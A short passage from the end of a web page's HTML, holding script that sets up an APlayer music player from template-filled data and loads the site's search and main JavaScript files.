  ap.on('pause', () => {
    document.getElementById('music-player').removeAttribute("play");
  });
};

const fetchData = () => {
  fetch('')
    .then(res => res.json())
    .then(result => initAplayer(result));
};

if ('') {
  document.addEventListener("DOMContentLoaded", fetchData);
} else {
  document.addEventListener("DOMContentLoaded", initAplayer());;
}</script>
<script src="/js/plugins/dist/search.js"></script>

<script src="/js/main.js" type="module"></script>
</div></body></html>